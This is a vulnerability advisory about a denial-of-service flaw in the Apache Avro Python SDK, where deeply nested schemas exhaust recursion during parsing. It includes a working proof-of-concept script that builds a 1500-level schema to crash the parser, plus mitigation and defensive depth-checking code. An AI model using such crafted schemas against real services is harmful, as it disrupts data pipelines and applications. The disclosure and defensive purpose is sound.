Apache Avro: Denial of Service (DoS) via Recursive Schema Parsing

Summary

The Apache Avro Python SDK is vulnerable to a Denial of Service (DoS) attack. A maliciously crafted Avro schema (.avsc) or data file (.avro) containing a deeply nested schema can trigger a RecursionError, the exception Python raises when the call stack exceeds the interpreter's recursion limit. If the application does not catch this exception, it crashes.

Vulnerability Details

  • Affected Component: avro.schema.parse and avro.io.DatumReader.
  • Root Cause: The function make_avsc_object in avro/schema.py parses nested records and types recursively. It enforces no depth limit and has no iterative fallback, so the recursion depth grows with the nesting depth of the input until the stack is exhausted.
  • Attack Vector: An attacker can provide a schema with hundreds or thousands of nested records (CPython's default recursion limit is 1000). When the application attempts to parse this schema, either directly or as part of reading an Avro data file, it triggers a RecursionError.
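The root cause described above can be illustrated with a toy example. The sketch below is not Avro's make_avsc_object; build_nested and count_records are hypothetical helpers that only mimic the pattern of one recursive call per nested record, which is enough to show why attacker-controlled nesting translates directly into stack depth.

```python
import sys


def build_nested(levels):
    """Build `levels` nested record dicts iteratively (no recursion needed)."""
    node = "int"
    for i in range(levels):
        node = {
            "type": "record",
            "name": f"L{i}",
            "fields": [{"name": "f", "type": node}],
        }
    return node


def count_records(node):
    """Toy recursive walker: uses one Python frame per nested record."""
    if not isinstance(node, dict) or node.get("type") != "record":
        return 0
    total = 1
    for field in node.get("fields", []):
        total += count_records(field["type"])
    return total


# Shallow input is handled without trouble.
print(count_records(build_nested(10)))  # 10

# Input nested deeper than the recursion limit cannot be walked recursively.
deep = build_nested(sys.getrecursionlimit() + 100)
try:
    count_records(deep)
except RecursionError:
    print("RecursionError: nesting exceeded the interpreter's recursion limit")
```

Note that building the nested input takes only a simple loop, so the attacker's cost is negligible compared with the effect on the parser.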

Impact

  • Severity: Medium (DoS)
  • Effect: Application crash when the RecursionError is not handled. This can be used to disrupt data processing pipelines, web services, or any other application that consumes untrusted Avro data or schemas.

Proof of Concept (PoC)

The following Python script generates a malicious schema and demonstrates the crash:

import avro.schema

# Malicious schema with 1500 nested records, built from the innermost record outwards
schema_str = '{"type": "record", "name": "L0", "fields": [{"name": "f", "type": "int"}]}'
for i in range(1, 1500):
    # Wrap the previous schema as the type of the only field of a new record
    schema_str = f'{{"type": "record", "name": "L{i}", "fields": [{{"name": "f", "type": {schema_str}}}]}}'

try:
    # Expected to raise RecursionError under the default recursion limit
    avro.schema.parse(schema_str)
except RecursionError:
    print("VULNERABILITY CONFIRMED: RecursionError during schema parsing!")
else:
    print("No RecursionError raised; this version may not be affected.")

Mitigation

  • Short-term: Implement a maximum recursion depth limit in avro.schema.parse.
  • Long-term: Refactor the schema parser to use an iterative approach instead of recursion.
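Until a fix lands in the library, an application can apply the same two ideas on its own side. The following is a minimal sketch, not part of the Avro API: container_depth, check_schema_depth, SchemaTooDeepError, and the MAX_SCHEMA_DEPTH value of 64 are all hypothetical names and choices. It measures the nesting depth of the decoded schema with an explicit stack instead of recursion and rejects input above the limit.

```python
import json

MAX_SCHEMA_DEPTH = 64  # hypothetical limit; tune for the schemas you expect


class SchemaTooDeepError(ValueError):
    """Raised when a schema nests deeper than the configured limit."""


def container_depth(node):
    """Return the maximum nesting depth of dicts/lists, computed iteratively."""
    max_depth = 0
    stack = [(node, 1)]  # explicit stack replaces the call stack
    while stack:
        current, depth = stack.pop()
        if isinstance(current, dict):
            children = current.values()
        elif isinstance(current, list):
            children = current
        else:
            continue  # scalars do not add nesting
        max_depth = max(max_depth, depth)
        for child in children:
            stack.append((child, depth + 1))
    return max_depth


def check_schema_depth(schema_json, limit=MAX_SCHEMA_DEPTH):
    """Decode schema_json and raise SchemaTooDeepError if it nests too deeply."""
    try:
        decoded = json.loads(schema_json)
    except RecursionError as exc:
        # The JSON decoder itself can hit the recursion limit on extreme input.
        raise SchemaTooDeepError("schema nesting exceeds decoder limits") from exc
    depth = container_depth(decoded)
    if depth > limit:
        raise SchemaTooDeepError(f"schema depth {depth} exceeds limit {limit}")
    return decoded


simple = '{"type": "record", "name": "L0", "fields": [{"name": "f", "type": "int"}]}'
print(container_depth(json.loads(simple)))  # 3: record dict, fields list, field dict
```

An application would call check_schema_depth on the untrusted string first and pass that string to avro.schema.parse only if no exception was raised. This bounds the JSON nesting a recursive parser has to descend through; it is a guard placed in front of the parser, not a replacement for fixing the parser itself.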